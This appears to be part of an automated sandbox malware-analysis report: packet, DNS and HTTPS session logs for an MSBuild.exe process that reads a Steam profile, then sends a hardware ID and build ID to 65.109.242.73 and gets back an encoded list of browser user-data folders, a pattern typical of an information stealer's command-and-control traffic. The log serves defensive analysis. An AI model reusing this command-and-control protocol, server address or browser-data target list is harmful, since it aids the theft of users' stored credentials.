                                                                                                                                                                                                                                            Apr 18, 2024 10:10:49.904493093 CEST49757443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:49.904515028 CEST4434975765.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:50.368880987 CEST4434975765.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:50.369004011 CEST49757443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:50.369574070 CEST49757443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:50.369582891 CEST4434975765.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:50.369765043 CEST49757443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:50.369771004 CEST4434975765.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:51.237457037 CEST4434975765.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:51.237545013 CEST4434975765.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:51.237624884 CEST49757443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:51.237624884 CEST49757443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:51.239840031 CEST49757443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:51.239861012 CEST4434975765.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:51.807903051 CEST49758443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:51.807959080 CEST4434975865.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:51.808031082 CEST49758443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:51.808264971 CEST49758443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:51.808281898 CEST4434975865.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:52.239537001 CEST4434975865.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:52.239773989 CEST49758443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:52.240525961 CEST49758443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:52.240550041 CEST4434975865.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:52.240705013 CEST49758443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:52.240716934 CEST4434975865.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:52.240813017 CEST49758443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:52.240843058 CEST4434975865.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:52.240860939 CEST49758443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:52.240869999 CEST4434975865.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:52.240926027 CEST49758443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:52.240957022 CEST4434975865.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:52.240983963 CEST49758443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:52.240997076 CEST4434975865.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:52.241136074 CEST49758443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:52.241173029 CEST4434975865.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:52.241295099 CEST49758443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:52.241313934 CEST4434975865.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:53.940304041 CEST4434975865.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:53.940397978 CEST49758443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:53.940464973 CEST4434975865.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:53.940502882 CEST4434975865.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:53.940524101 CEST49758443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:53.940562963 CEST49758443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:53.940721035 CEST49758443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:53.940749884 CEST4434975865.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:53.945506096 CEST49759443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:53.945539951 CEST4434975965.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:53.945628881 CEST49759443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:53.946146011 CEST49759443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:53.946158886 CEST4434975965.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:54.379512072 CEST4434975965.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:54.379612923 CEST49759443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:54.380413055 CEST49759443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:54.380419970 CEST4434975965.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:54.380836964 CEST49759443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:54.380841970 CEST4434975965.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:55.247548103 CEST4434975965.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:55.247710943 CEST4434975965.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:55.247788906 CEST49759443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:55.247828007 CEST49759443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:55.248061895 CEST49759443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:55.248079062 CEST4434975965.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:55.249680042 CEST49760443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:55.249753952 CEST4434976065.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:55.249855042 CEST49760443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:55.250351906 CEST49760443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:55.250386000 CEST4434976065.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:55.689191103 CEST4434976065.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:55.689436913 CEST49760443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:55.690232992 CEST49760443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:55.690259933 CEST4434976065.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:55.690309048 CEST49760443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:55.690323114 CEST4434976065.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:56.250303984 CEST4973180192.168.2.4172.64.149.23
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:56.250396967 CEST4973080192.168.2.4172.64.149.23
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:56.354592085 CEST8049731172.64.149.23192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:56.354656935 CEST8049730172.64.149.23192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:56.354716063 CEST4973180192.168.2.4172.64.149.23
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:56.354756117 CEST4973080192.168.2.4172.64.149.23
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:56.547329903 CEST4434976065.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:56.547435045 CEST49760443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:56.547472000 CEST4434976065.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:56.547496080 CEST4434976065.109.242.73192.168.2.4
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:56.547653913 CEST49760443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:56.547653913 CEST49760443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:56.547712088 CEST49760443192.168.2.465.109.242.73
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:56.547734976 CEST4434976065.109.242.73192.168.2.4

                                                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:17.020478964 CEST6358353192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:17.125441074 CEST53635831.1.1.1192.168.2.4

                                                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:17.020478964 CEST192.168.2.41.1.1.10xcbbeStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:17.125441074 CEST1.1.1.1192.168.2.40xcbbeNo error (0)steamcommunity.com23.4.32.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:33.734188080 CEST1.1.1.1192.168.2.40x3fd6No error (0)windowsupdatebg.s.llnwi.net69.164.42.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:34.692975044 CEST1.1.1.1192.168.2.40x72d0No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Apr 18, 2024 10:10:34.692975044 CEST1.1.1.1192.168.2.40x72d0No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                                                            • steamcommunity.com
                                                                                                                                                                                                                                            • 65.109.242.73

                                                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            0192.168.2.44973223.4.32.2164436360C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-04-18 08:10:17 UTC119OUTGET /profiles/76561199673019888 HTTP/1.1
                                                                                                                                                                                                                                            Host: steamcommunity.com
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            2024-04-18 08:10:17 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                                                                                                                                                                                                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Date: Thu, 18 Apr 2024 08:10:17 GMT
                                                                                                                                                                                                                                            Content-Length: 33795
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: sessionid=477bfab797185d3872c8acbb; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                            Set-Cookie: steamCountry=US%7C0260b8e04ad19c244dfaa60e7b0ec044; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                            2024-04-18 08:10:17 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                                                            2024-04-18 08:10:17 UTC10062INData Raw: 20 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6c 69 6e 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0d 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0d 0a 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                                                            Data Ascii: global_action_link" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">
                                                                                                                                                                                                                                            2024-04-18 08:10:17 UTC9219INData Raw: 72 2e 73 74 65 61 6d 67 61 6d 65 73 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 41 54 53 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 70 61 72 74 6e 65 72 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 49 4e 54 45 52 4e 41 4c 5f 53 54 41 54 53 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 65 61 6d 73 74 61 74 73 2e 76 61 6c 76 65 2e 6f 72 67 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 49 4e 5f 43 4c 49 45 4e 54 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 55 53 45 5f 50 4f 50 55 50 53 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 49 43 4f 4e
                                                                                                                                                                                                                                            Data Ascii: r.steamgames.com\/&quot;,&quot;STATS_BASE_URL&quot;:&quot;https:\/\/partner.steampowered.com\/&quot;,&quot;INTERNAL_STATS_BASE_URL&quot;:&quot;https:\/\/steamstats.valve.org\/&quot;,&quot;IN_CLIENT&quot;:false,&quot;USE_POPUPS&quot;:false,&quot;STORE_ICON


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            1192.168.2.44973365.109.242.734436360C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-04-18 08:10:18 UTC170OUTGET / HTTP/1.1
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                            Host: 65.109.242.73
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            2024-04-18 08:10:19 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Thu, 18 Apr 2024 08:10:19 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2024-04-18 08:10:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            2192.168.2.44973465.109.242.734436360C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-04-18 08:10:19 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBG
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                            Host: 65.109.242.73
                                                                                                                                                                                                                                            Content-Length: 279
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            2024-04-18 08:10:19 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 32 39 37 43 34 34 36 38 42 42 31 32 35 31 38 30 32 30 37 37 37 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 34 38 64 33 66 64 65 32 65 35 31 31 31 62 64 33 30 64 33 66 66 34 66 35 63 34 64 64 39 64 0d 0a 2d 2d 2d 2d 2d 2d
                                                                                                                                                                                                                                            Data Ascii: ------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="hwid"9297C4468BB12518020777-a33c7340-61ca-11ee-8c18-806e6f6e6963------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="build_id"d848d3fde2e5111bd30d3ff4f5c4dd9d------
                                                                                                                                                                                                                                            2024-04-18 08:10:20 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Thu, 18 Apr 2024 08:10:20 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2024-04-18 08:10:20 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 35 65 30 32 64 36 31 65 62 64 32 61 36 64 61 37 32 38 65 33 65 36 64 61 66 62 39 36 63 34 33 63 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 3a1|1|1|1|5e02d61ebd2a6da728e3e6dafb96c43c|1|1|1|0|0|50000|10


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            3192.168.2.44973565.109.242.734436360C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-04-18 08:10:20 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----AKKKFBGDHJKFHJJJJDGC
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                            Host: 65.109.242.73
                                                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            2024-04-18 08:10:20 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 30 32 64 36 31 65 62 64 32 61 36 64 61 37 32 38 65 33 65 36 64 61 66 62 39 36 63 34 33 63 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 34 38 64 33 66 64 65 32 65 35 31 31 31 62 64 33 30 64 33 66 66 34 66 35 63 34 64 64 39 64 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                            Data Ascii: ------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="token"5e02d61ebd2a6da728e3e6dafb96c43c------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="build_id"d848d3fde2e5111bd30d3ff4f5c4dd9d------AKKKFBGDHJKFHJJJJDGCCont
                                                                                                                                                                                                                                            2024-04-18 08:10:21 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Thu, 18 Apr 2024 08:10:21 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2024-04-18 08:10:21 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                                                                                            Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            4192.168.2.44973665.109.242.734436360C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-04-18 08:10:22 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----EHDAFIJJECFHJJKFCAKJ
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                            Host: 65.109.242.73
                                                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
